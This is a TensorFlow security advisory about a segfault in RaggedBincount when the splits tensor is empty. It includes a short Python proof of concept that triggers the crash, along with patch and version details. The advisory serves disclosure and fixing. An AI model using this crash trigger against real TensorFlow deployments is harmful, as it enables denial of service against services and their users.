If RaggedBincount
is given an empty input tensor splits
, it results in a segfault that can be used to trigger a denial of service attack.
import tensorflow as tf
binary_output = True
splits = tf.random.uniform(shape=[0], minval=-10000, maxval=10000, dtype=tf.int64, seed=-7430)
values = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000)
size = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.int32, seed=-10000)
weights = tf.random.uniform(shape=[], minval=-10000, maxval=10000, dtype=tf.float32, seed=-10000)
tf.raw_ops.RaggedBincount(splits=splits, values=values, size=size, weights=weights, binary_output=binary_output)
We have patched the issue in GitHub commit 7a4591fd4f065f4fa903593bc39b2f79530a74b8.
The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
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This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University
{ "nvd_published_at": "2022-09-16T22:15:00Z", "cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2022-09-16T22:29:01Z" }